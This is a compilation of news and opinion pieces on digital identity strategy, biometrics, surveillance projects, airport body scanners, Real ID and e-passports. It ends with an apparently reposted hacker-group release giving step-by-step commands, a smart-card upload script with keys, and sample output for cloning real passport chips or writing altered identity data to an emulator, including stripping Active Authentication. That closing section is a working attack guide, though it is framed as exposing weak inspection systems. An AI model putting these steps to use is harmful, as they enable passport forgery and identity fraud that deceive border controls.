Cyberspace has become an indispensible component of everyday life for all Americans.  We have all witnessed how the application and use of this technology has increased exponentially over the years. Cyberspace includes the networks in our homes, businesses, schools, and our Nation’s critical infrastructure.  It is where we exchange information, buy and sell products and services, and enable many other types of transactions across a wide range of sectors. But not all components of this technology have kept up with the pace of growth.  Privacy and security require greater emphasis moving forward; and because of this, the technology that has brought many benefits to our society and has empowered us to do so much — has also empowered those who are driven to cause harm.

Today, I am pleased to announce the latest step in moving our Nation forward in securing our cyberspace with the release of the draft National Strategy for Trusted Identities in Cyberspace (NSTIC).  This first draft of NSTIC was developed in collaboration with key government agencies, business leaders and privacy advocates. What has emerged is a blueprint to reduce cybersecurity vulnerabilities and improve online privacy protections through the use of trusted digital identities.

The NSTIC, which is in response to one of the near term action items in the President’s Cyberspace Policy Review, calls for the creation of an online environment, or an Identity Ecosystem as we refer to it in the strategy, where individuals and organizations can complete online transactions with confidence, trusting the identities of each other and the identities of the infrastructure that the transaction runs on. For example, no longer should individuals have to remember an ever-expanding and potentially insecure list of usernames and passwords to login into various online services. Through the strategy we seek to enable a future where individuals can voluntarily choose to obtain a secure, interoperable, and privacy-enhancing credential (e.g., a smart identity card, a digital certificate on their cell phone, etc) from a variety of service providers – both public and private – to authenticate themselves online for different types of transactions (e.g., online banking, accessing electronic health records, sending email, etc.). Another key concept in the strategy is that the Identity Ecosystem is user-centric – that means you, as a user, will be able to have more control of the private information you use to authenticate yourself on-line, and generally will not have to reveal more than is necessary to do so.

The Department of Homeland Security (DHS), a key partner in the development of the strategy, has posted the draft NSTIC at www.nstic.ideascale.com. Over the next three weeks (through July 19^th), DHS will be collecting comments from any interested members of the general public on the strategy. I encourage you to go to this website, submit an idea for the strategy, comment on someone else’s idea, or vote on an idea. Your input is valuable to the ultimate success of this document. The NSTIC will be finalized later this fall.

Howard A. Schmidt is the Cybersecurity Coordinator and Special Assistant to the President

We’ve all seen movies in which a character has a retinal scan to prove his or her identity before walking into a top-secret installation. That’s an example of a biometric system. In general, biometrics is a collection of measures of human physiology and behavior. A biometric system could scan a person’s fingerprint or analyze the way he or she types on a keyboard. The purpose of most biometric systems is to authenticate a person’s claimed identity.

Biometrics tend to be more convenient than other methods of identity authentication. You might forget your ID at home when you head out the door, but you’ll still be able to use biometric devices. Imagine verifying your identity while at the store by swiping your finger across a sensor.

But along with convenience and security comes a concern for privacy. For biometrics to work, there needs to be a database containing the relevant information for each individual authorized by the system. For example, at that top-secret installation, every employee’s biometric signature would have to be recorded so that the scanners could verify each person’s identity. This might not present much of a problem on its own. If the only data the system stores relates to the actual biometric measurements, privacy violations are at a minimum. But by their very nature, biometric systems collect more information than just the users’ fingerprints, retinal patterns or other biometric data. At a basic level, most systems will record when and where a person is at the time of a scan.

I Recognize That Face

Biometric systems with cameras may use facial recognition software or study the way you move to identify you.

You might think of fingerprint or retinal scanners when you hear the word Biometrics, but the term has a broader definition. Facial recognition technology falls into the biometric category. There are already several cameras on the market that can detect faces. A few are able to recognize and remember a group of faces. You just take a picture of a friend, tag the photo and the camera will automatically tag any future photos of that friend. It’s both cool and creepy.

Imagine using this technology in public places to identify the people passing through. For example, a major city might install cameras at high-traffic areas to scan for terrorists or identify criminals. While the motivation for using that technology might be pure, it creates difficult privacy issues. The city would have a record of everyone who passed through that neighborhood. The technology treats everyone as a suspect as if it’s only a matter of time before each of us commits a crime.

And what happens if the technology makes a mistake and misidentifies someone? Weather conditions, clothing, hairstyles and even the cleanliness of the lens could affect the ability of the camera to identify people. Critics might ask: Why install a system that’s unreliable?

What happens if a person suffers an illness or injury that changes his or her appearance? Such a change could present problems with biometrics. Adjusting the biometric system to accommodate the change could also result in a violation of the user’s privacy. The system administrator now knows more details about the user.

A society with pervasive biometric systems would make anonymity a virtual impossibility. Should that society become oppressive or otherwise abusive to the population, the citizens would have few opportunities to react without revealing their own identities.

Groups like the Biometrics Institute are aware of privacy concerns and strive to create processes to limit the chance for biometric applications to violate a person’s privacy. Other groups advocate that companies, governments and other organizations conduct a privacy assessment before installing a biometric system. With vigilance and caution, we may find a way to incorporate biometrics into our lives and still maintain our privacy.

As concerns over identity theft and ATM or other financial transaction fraud continue to rise, some are pushing for biometric authentication technology to be integrated into ATMs and possibly other devices used in financial transactions. In an article from NEXT, a number of flaws in the current system for ATMs as well as a number of examples of how wrongs can be righted are cited.

Among the flaws, the article is quick to point out the ease with which fraudsters can clone cards, or more commonly in developing countries, get vital account information such as PIN numbers from acquaintances working for banks. Additionally, this call for ATMs with biometric authentication capability is not a call for new technology necessarily as banks such as Western Bank in the U.S., Banco Falabella in Chile, Groupo Financiero Banorte in Mexico, Barclays Bank in the UAE and many others around the world are already offering such technology to their customers.

By John Ozimek • The Register

Radical Think Tank Open Europe has this week exposed a study by the EU that could lead to the creation of a massive cross-Europe database, amassing vast amounts of personal data on every single citizen in the EU.

The scope of this project also reveals a growing governmental preference for systems capable of locking people up not for what they have done, but for what they might do.

Open Europe (OE) researcher, Stephen Booth, has been reviewing projects currently in receipt of EU funding. Last week he identified one of these - Project INDECT – as having potentially far-reaching effects for anyone living or working in Europe. The main objectives of this project, according to its own website, are:

To develop a platform for: the registration and exchange of operational data, acquisition of multimedia content, intelligent processing of all information and automatic detection of threats and recognition of abnormal behaviour or violence, to develop the prototype of an integrated, network-centric system supporting the operational activities of police officers.

In addition, it aims “to develop a set of techniques supporting surveillance of internet resources, analysis of the acquired information, and detection of criminal activities and threats.”

There are two controversial aspects to this research. First is the extent of data collection implied by the project scope. Second, and perhaps far more worrying, is the proposition that law enforcement agencies, in possession of sufficient data, will in future be able to model potentially criminal and anti-social behaviour and therefore focus on individuals before crimes are committed.

In this, it echoes another EU-sponsored piece of research – ADABTS – which is all about Automatic Detection of Abnormal Behaviour and Threats in crowded Spaces. According to the ADABTS prospectus, it “aims to develop models for abnormal and threat behaviours and algorithms for automatic detection of such behaviours as well as deviations from normal behaviour in surveillance data.”

The INDECT project is co-ordinated by Polish academic Professor Andrzej Dziech. Participants include several institutions from Poland – which until recently had its own issues with over-arching state surveillance – as well as the Northern Ireland Police Service.

Shami Chakrabarti, the director of human rights group Liberty, described this approach as a “sinister step” for any country, but “positively chilling” on a European scale.

Stephen Booth added: “The problem with the EU funding these types of projects is the lack of accountability. Citizens are left completely in the dark as to who has approved them and there is no way to ensure that civil liberties are being duly respected.

“The absence of any political debate about the use of these new surveillance technologies in our society is a very dangerous trend, which is especially acute at the EU level.”

However, the idea of punishing potential criminals is not just an EU notion. As El Regreported last year, the Home Office has certainly considered the use of automated profiling to check travellers at points of entry to the UK. This has been controversial, both because of the veiled racism implied by such a policy, as well as evidence provided to the Home Office that it might not actually work.

However, the Vetting Database – which is due to go live later this year – will take decisions on whether people are fit to work in millions of “regulated” positions on the basis of a scoring system, designed to “predict” likelihood to offend.

The introduction of predictive models into society appears to be carrying on apace, with very little public debate as to how desirable they are, or how the state should compensate citizens where mistakes occur. There is also a blurring of the lines between predicting a threat – in which case law enforcement officers can be asked to investigate – and simply predicting criminality and penalising an individual on the basis of something they have not yet done.

OE is interested in seeing less formal integration across Europe, and a return to more issues being resolved at the national level. Their investigation looked at funding provided under the Seventh Framework Programme (FP7). This can be accessed via the Cordis portal, and is a mechanism whereby funds controlled by the EU Commission are made available for research projects.

The existence of an FP7 project is not necessarily an indicator of EU policy in an area, but it is clear evidence of some interest in the approach being investigated.

Project INDECT launched on 1 January this year with a project budget of 14.86 million Euros. It is due to deliver the goods, including a 15-node pilot project, by the end of 2013. ®

Body scanners that see through clothing have been available for several years, but their introduction has been slowed in some countries by privacy concerns. The American Civil Liberties Union for example has denounced the machines as a “virtual strip search” because they display the body’s contours on a computer screen with great clarity.

New software however can protect travellers’ privacy by producing a stylised image of the body instead of a more detailed picture.

Some manufacturers already offer privacy enhancements such as blurred faces or bodily images that look like chalk outlines. 

A body scanner at Amsterdam's Schiphol airport (Keystone)

A debate has been sparked in Switzerland over installing body scanners in airports after a terrorist attempt prompted the Netherlands to roll out the machines.

The Swiss aviation authority says the scanners would be a useful security tool, but the defence minister has ruled them out.

Dutch authorities say 15 of the machines will be in use at Amsterdam’s Schiphol airport within three weeks for passengers travelling to the United States. Nigeria and Britain also plan to introduce the scanners soon.

It follows an attempt to blow up an aircraft over Detroit on Christmas Day. Nigerian terrorist Umar Farouk Abdulmutallab had boarded the Northwest Airlines plane in Amsterdam wearing the explosives under his clothes, but the device burst into flames instead of detonating. 

A key European lawmaker has called for greater use of the scanners, which capture detailed images of people’s body contours and are designed to spot explosives and other non-metallic objects that a metal detector would miss. 

Peter van Dalen, vice chairman of the European Parliament’s transport committee, said newer technology showed the scanners did not violate travellers’ privacy and urged the installation of the equipment across the 27-nation bloc. 

In 2008 the European Parliament voted against using such machines and called for further study, allowing Schiphol to conduct a pilot test of the scanners.

In Switzerland, although airport security measures were tightened over the holiday period, opinion was divided over the merits of bringing in such scanners.

“Effective tool”

The Swiss Federal Office of Civil Aviation (FOCA) said there were no plans underway to introduce the scanners in Geneva, Zurich or Basel airports, but if the machines were approved on a European level Swiss airports should follow suit. 

Spokesman Daniel Göring told Swiss radio that the scanners could be “useful and effective” as a complementary tool for existing security controls, and he backed their introduction across Europe. 

However, Defence Minister Ueli Maurer was quick to dismiss the machines. “It would be unacceptable for people to be viewed completely naked,” he told television station TeleZüri. 

Less drastic measures would be just as effective, he argued, such as improving counter-terrorism alert systems, strengthening collaboration between secret services and the international exchange of information. 

For its part Geneva airport said it was already responding to recommended security measures and it did not foresee installing the scanners as there were no convincing arguments for them in the locations where they had already been in use. 

“But if FOCA or American companies require it, we will adapt,” a spokesman said.

More privacy

Body scanners that see through clothing have been available for several years, but their introduction has been slowed in some countries by privacy concerns. The American Civil Liberties Union for example has denounced the machines as a “virtual strip search” because they display the body’s contours on a computer screen with great clarity.

New software however can protect travellers’ privacy by producing a stylised image of the body instead of a more detailed picture.

Some manufacturers already offer privacy enhancements such as blurred faces or bodily images that look like chalk outlines.

On Sunday Britain’s main airport operator BAA said it had ordered full-body scanners and would introduce them as soon as possible. BAA operates Europe’s busiest airport, Heathrow, as well as other British airports.

Travel inconveniences

Kurt Spillman, a professor in conflict research and security at the Federal Institute of Technology in Zurich, still expects body scanners to be in use in Switzerland within two to five years. 

“Switzerland will take on the standards of the EU. I think body scanning, as an additional security measure for preventing terrorist attacks, will be used for flights to the US,” he told the Neue Luzerner newspaper.

He thought the extra security step would eventually become accepted by passengers, as have other measures in place since the 9/11 attacks.

“Despite all the inconveniences such as removing shoes [at the security checks] or the ban on carrying liquids in hand luggage, people continue to travel unabated around the world,” he said.

“Body scanning slows down the check-in procedure, it’s unpleasant, but there’s no stopping it. Anyone who does not want to undergo this can stay at home.”

swissinfo.ch and agencies

Originally Published:Sunday, December 27th 2009, 11:11 PM
Updated: Tuesday, December 29th 2009, 1:25 PM

Some fliers say whole body scanners, which cost about $150,000 apiece, are no more invasive than a security patdown procedure.

Some fliers say whole body scanners, which cost about $150,000 apiece, are no more invasive than a security patdown procedure.

Read more:

http://www.nydailynews.com/news/national/2009/12/28/2009-12-28_fliers_favor_naked_truth_in_airport_body_scanners.html#ixzz0bZ4ftN3K

Bring on the body scans!

Beleaguered airline passengers said Sunday they have no problem with controversial new “whole body scan” machines that give screeners an undressed view of travelers.

The technology is in use at a handful of U.S. airports, including Salt Lake City and Los Angeles International, and is still being tested by the Transportation Security Administration.

“I don’t mind [the scanner] because it would be in place for safety,” said Samantha Day, 44, who flew into Kennedy Airport from London.

“It’s no more invasive than someone touching every part of your body” during existing patdown security procedures, added Marni Blitz of Robbinsville, N.J.

Opponents argue the machines violate personal privacy because they show images of the naked body. Advocates counter that they’re vital to safety – and would have detected the explosives sewn into the underwear of a Nigerian man who tried to blow up a flight over Detroit on Christmas Day.

The body imaging machines cost about $150,000. They emit some radiation, but experts say it’s far less than what passengers are exposed to on a normal flight.

Former Homeland Security chief Michael Chertoff told the Daily News that naysayers have delayed installation of the scanners.

He said the botched attack on Flight 253 shows that they are a needed weapon in the anti-terror arsenal.

“Privacy advocates and the ACLU have slowed or stopped the deployment of the machines with a barrage of objections,” Chertoff said in an e-mail. “The bad guys have figured out this vulnerability. Isn’t it time we deployed these machines?”

Read more:

http://www.nydailynews.com/news/national/2009/12/28/2009-12-28_fliers_favor_naked_truth_in_airport_body_scanners.html#ixzz0bZ4vfGUI

Real ID Follies Continue with PASS ID Waiting in the Wings: Via EFF.org Updates.

Since 2007, the U.S. State Department has been issuing high-tech “e-passports,” which contain computer chips carrying biometric data to prevent forgery. Unfortunately, according to a March report from the Government Accountability Office (GAO), getting one of these supersecure passports under false pretenses isn’t particularly difficult for anyone with even basic forgery skills.

As 2009 draws to a close, we’re inching ever deeper into the corner that Congress painted us into by passing Real ID under the table in 2005. (Recall that Real ID is the failed, Bush-era attempt to turn state drivers licenses into national ID cards by forcing states to collect and store licensee data in databases, and refusing to accept non-compliant IDs for federal purposes, like boarding a plane or entering a federal building.)

The official deadline for states to comply with the Department of Homeland Security’s (DHS) final Real ID rule is December 31, 2009, and an estimated 36 states will not be in compliance by then, leading to some ambiguity for many citizens. For example, will residents of Montana be able to board planes in January 2010 with only a driver’s license (a state-supplied, technically non-compliant document) and without a passport (an identity document issued by the federal government)?

Past history strongly suggests that DHS will issue last-minute waivers to states that have not amped up their drivers licenses to adhere to Real ID. Early in 2008, states that actively opposed Real ID received waivers from DHS, nominally marking the states as “compliant” despite strongly-stated opposition to ever implementing Real ID.

But waiting in the wings is PASS ID, a bill that attempts to grease the wheels by offering money to the states to implement ID changes. Despite having the appearances of reform, PASS ID essentially echoes Real ID in threatening citizens’ personal privacy without actually justifying its impact on improving security. For this reason, PASS ID is not popular — privacy advocates refuse to support the bill because it still creates a national ID system. It still mandates the scanning and storage of applicants’ critical identity documents (birth certificates, visas, etc.), which will be stored in databases that will become leaky honeypots of sensitive personal data — prime targets for malicious identity thieves or otherwise accessible by individuals authorized to obtain documents from the database. And on the other side, short-sighted surveillance hawks are unhappy with the bill because they support the privacy violations architected into the provisions of the original Real ID Act.

As such, advocates of PASS ID are publicly wringing their hands over the deadline in order to encourage Congress to approve the PASS ID Act before the end of the year. But the fracas over health reform is suffocating any chance for meaningful debate about the merits of PASS ID before the Dec. 31st deadline.

A pragmatic analysis should show that Real ID is dead. To date, 24 states have enacted resolutions or binding legislation prohibiting participation in Real ID, and the varied, desperate efforts to reanimate it are misguided. Whether the states or the federal government signs the invoice, the cost ultimately falls to taxpayers, who should be troubled that neither Real ID nor PASS ID is likely to fulfill the stated goal of stopping terrorists from obtaining identity documents. (Just this week, noted security expert Bruce Schneier linked to a report about government investigators successfully using fake identity documents to obtain high-tech “e-passports,” which were then used to buy plane tickets, and board flights — the point being that a fancy, “secure” identity document doesn’t stop individuals from exploiting a weak bureaucracy.)

On the other hand, the resulting databases filled with scanned identity documents will, create tantalizing targets for identity thieves and headaches for people whose digital documents are pilfered; and a national ID system will invite mission creep from the government as well as private entities like credit reporting agencies and advertisers. It’s high time for reason to replace the reflexive defense of a failed scheme. Congress should repeal Real ID for real and seek more inspired, protective solutions to identity document security.

Anyone who follows the news has no doubt come across the claim that “Israel is the only democracy in the Middle East.” Usually, this claim is followed by its logical inference: “As an island of freedom located in a region controlled by military dictators, feudal kings and religious leaders” - Not any more – Israel democracy is now controlled by superficial politicians…

Black Day for Democracy

By Gil Ronen and Nissan Ratzlav-Katz

(IsraelNN.com) The Knesset plenum approved Monday evening the ‘Biometric Law’ in the final readings. Forty Knesset members voted in favor of the law, 11 against and three abstained. The purpose of the law is the creation of a biometric database that would hold the fingerprints and facial photos of all of the country’s citizens. The data would be stored in the Interior Ministry computers.

MK Nitzan Horowitz (Meretz), who led the opposition to the law, said after its approval that the vote was “a serious mistake which causes grave harm to freedom of the individual in Israel.”

“I hope that we do not pay too heavy a price for it,” Horowitz said. “In any case, it has been proven that an unrelenting public struggle by idealists can have influence and make a difference. The proof is that the law in its final wording is completely different from the original version.”

During the Knesset debate about the law, MK Horowitz stood at the podium and held up printouts of information from the Ministry of Interior’s database which contained information about Knesset members and which reached the Internet. He said that he would not show the contents so as not to invade the MKs’ privacy. “The leaked data which reached my hands prove how easy it is to break into government databases,” he said. “I hope that this will not be the fate of the biometric database.”

MK Dov Henin (Hadash) said that despite the government’s statements that it would not force Israeli citizens to join the database, “in fact, whoever does not do so would be punished – he will not be able to leave the country’s borders, since he would not receive a passport at the level required in developed countries.” The database is not truly a voluntary one, he said.

Faked fingerprints
On the same day that the Knesset approved the law, there news from Tokyo that appeared to show that this system, too, was not foolproof. Police in the Japanese capital said that they arrested a 27-year-old Chinese woman suspected of illegally entering the country after surgically altering her fingerprints to deceive a biometric recognition system operated by immigration officials.

Commissioner warns passport office not to include biometric info on radio chips

By ALTHIA RAJ, NATIONAL BUREAU

The federal privacy watchdog has rejected Passport Canada’s plan to embed fingerprints and iris scans in electronic passports.

In a review of the project, the Office of the Privacy Commissioner told the passport office not to include new biometric information on a radio-frequency chip encoded in e-passports.

“The more information you collect, the more information you put at risk,” said assistant privacy commissioner Chantal Bernier.

She said Passport Canada “backed away” from putting more data on the chip than they currently collect.

DIGITIZED PICTURE

E-passports will feature a digitized picture of the passport holder as well as their name, date of birth, location of birth and passport number, said Passport Canada spokesman Jean-Sebastien Roy.

A national rollout of the e-passport is expected to begin in 2011.

“(They provide) greater protection against fraudulent misuse and tampering, and reduce the risk of identity fraud,” Roy said.

The privacy commissioner’s review raised concerns about whether the chip is “adequately protected against unauthorized interception,” such as skimming and eavesdropping. The watchdog noted an e-passport hacking case in the United Kingdom.

“If the data can be readily copied and replicated, electronic passports may do more to facilitate identity theft than to prevent it,” said Jason Gratl of the B.C. Civil Liberties Association.

The passport office said its chip can only be read 10 cm away.

‘HIGH RISKS’

David Harris, former chief of strategic planning for the Canadian Security Intelligence Service (CSIS), said there are “high risks” associated with electronic databases, but comprehensive information such as biometrics in passports are needed to guard against terrorist threats.

“We’ve got to be all the more careful in doing what might prove to be unavoidable,” he said.

Canadian e-passports were developed after the International Civil Aviation Organization adopted new requirements for an embedded chip in 2005.

Privacy advocates say the chip raises additional concerns, such as the potential to build databases that track travellers across national boundaries.

“It substantially increases the powers of the state to survey individuals,” said University of Toronto professor Andrew Clement. Databases are often created with one goal and then used for other purposes, he said.

Richard Rosenberg of the Freedom of Information and Privacy Association said he is concerned Canadians won’t be able to check the accuracy of the information on the chip and risk being unfairly blacklisted like many travellers on the no-fly list.

The passport office said it has no plans to collect or use the information in other ways and promised to investigate options to allow individuals to access the data on their chip.

ALTHIA.RAJ@SUNMEDIA.CA

THC/vonJeek proudly presents an ePassport emulator. This emulator applet
allows you to create a backup of your own passport chip(s).


The government plans to use ePassports at Immigration and Border
Control. The information is electronically read from the Passport
and displayed to a Border Control Officer or used by an automated
setup. THC has discovered weaknesses in the system to (by)pass the
security checks. The detection of fake passport chips does not
work. Test setups do not raise alerts when a modified chip
is used. This enables an attacker to create a Passport with an
altered Picture, Name, DoB, Nationality and other credentials.

The manipulated information is displayed without any alarms going off.
The exploitation of this loophole is trivial and can be verified using
thc-epassport.

Regardless how good the intention of the government might have been, the
facts are that tested implementations of the ePassports Inspection System
are not secure.

ePassports give us a false sense of security: We are made to believe
that they make usemore secure. I'm afraid that's not true: current
ePassport implementations don't add security at all.

Thanks to Elv1s for beta testing!

Just follow two easy steps:

(1) Upload the emulator code to a blank JCOP v4.1 72k smart card
Use your favorite tool to upload the CAP file. As an example GPShell is
used. The script used to upload the CAP file:

P:\GPShell-1.4.2>type epassport.script
mode_211
enable_trace
establish_context
// edit the following line to match your PCSC reader
card_connect -readerNumber 3
select -AID A000000003000000
open_sc -security 3 -mac_key 404142434445464748494A4B4C4D4E4F -enc_key 404142434445464748494A4B4C4D4E4F -kek_key 404142434445464748494A4B4C4D4E4F
delete -AID A00000024710
install -file epassport.cap -priv 2
card_disconnect
release_context

A sample output of an actual upload:

P:\GPShell-1.4.2>GPShell.exe epassport.script
mode_211
enable_trace
establish_context
card_connect -readerNumber 3
* reader name OMNIKEY CardMan 5x21-CL 0
select -AID a000000003000000
Command --> 00A4040008A000000003000000
Wrapped command --> 00A4040008A000000003000000
Response <-- 6F108408A000000003000000A5049F6501FF9000
..
..
..
Wrapped command --> 84E60C002506A0000002471007A000000247100107A00000024710010100
02C90000B918E8E43A25117700
Response <-- 9000
card_disconnect
release_context

The CAP file currently supports the following files:

 * EF.COM :    32 bytes (required file)
 * EF.SOD :  2560 bytes (required file)
 * EF.DG1 :    96 bytes (required file)
 * EF.DG2 : 24576 bytes (required file)
 * EF.DG11:    64 bytes (optional, e.g. USA)
 * EF.DG12:    96 bytes (optional, e.g. USA)
 * EF.DG13:    96 bytes (optional, e.g. Japan, France)
 * EF.DG15:   192 bytes (optional, e.g. The Netherlands)

If you need support for other / larger DGs, please let vonJeek know.

(2a) Clone the chip
Using a customized THC version of Adam Laurie's RFIDIOt tools, you're able
to read a chip's content and to write it to an emulator.

P:\RFIDIOt-vonjeek>mrp0wn.py CLONE M3V0NJ33K000000999999

===============================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek <mailto:vonjeek@thc.org> =
= Use Jeroen van Beek's ePassport emulator as the target device.              =
===============================================================================
Put a ePassport near the terminal and press enter to continue...
Reading document using KEY M3V0NJ33K000000999999, please be patient...
Put the emulator near the terminal and press enter to continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.

Done, happy mrp0wning  

Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"

If your chip is protected using the optional Active Authentication mechanism,
the Active Authentication data group (DG15, tag 0x6F) is removed from EF.COM
as demonstrated by Jeroen van Beek at the 2008 USA BlackHat Briefings. Note
that mrp0wn.py's parameter 'STRIP_AA' must be set to the value 'True'. This
attack will work on all inspection system implementations that are using e.g.
ICAO's "worked examples", see this site for more info on that.

(2b) Write saved data
It's also possible to write chip data you've saved earlier using RFIDIOt's
mrpkey.py. As an example you can use vonJeek's ePassport data. Note that
this data is self-signed: vonJeek started his own country 

P:\tmp>unzip vonjeek-epassport_dump.zip
Archive:  vonjeek-epassport_dump.zip
 extracting: EF_COM.BIN
  inflating: EF_DG2.BIN
  inflating: EF_DG1.BIN
 extracting: EF_SOD.BIN 

P:\>cd \RFIDIOt-vonjeek 

P:\RFIDIOt-vonjeek>mrp0wn.py WRITE /tmp

===============================================================================
= mrp0wn.py, an RFIDIOt ePassport utility by vonJeek ;lt;mailto:vonjeek@thc.org> =
= Use Jeroen van Beek's ePassport emulator as the target device.              =
===============================================================================
Document type is PASSPORT.
Put the emulator near the terminal and press enter to continue...
Writing new ePassport using files in /tmp.
Writing /tmp/EF_COM.BIN: 0 bytes left...
Writing /tmp/EF_SOD.BIN: 0 bytes left...
Writing /tmp/EF_DG1.BIN: 0 bytes left...
Writing /tmp/EF_DG2.BIN: 0 bytes left...
Setting the secret key to M3V0NJ33K200000009999998.
Done, happy mrp0wning  

Use the following command to read the chip:
./mrpkey.py "M3V0NJ33Kxxxx000000xx999999xxxxxxxxxxxxxxxxx"

You can also alter data before writing it to an emulator chip. If you want
to do that: this document contains details about - amongst others - DG1 and
DG2 encoding. If you've updated the DGs you can sign them using Peter
Gutmann's CryptLib. 

A read-out of vonJeek's ePassport chip using the reference implementation
named Golden Reader Tool can be seen below.

If you're interested in ePassport related PKI (how to verify whether chip
content is signed by a bonafide authority?) please check the following URLs:

* http://www2.icao.int/en/MRTD/Pages/icaoPKD.aspx
* http://www.icao.int/icao/en/atb/meetings/2008/TagMRTD18/TagMrtd18_ip04.pdf
* http://www.csca-si.gov.si/TR-PKI_mrtds_ICC_read-only_access_v1_1.pdf
* http://www.timesonline.co.uk/tol/news/uk/crime/article4467106.ece
* http://www.timesonline.co.uk/tol/news/uk/crime/article4467098.ece 

Yours sincerly,

vonjeek [at] thc dot org
The Hackers Choice

http://www.thc.org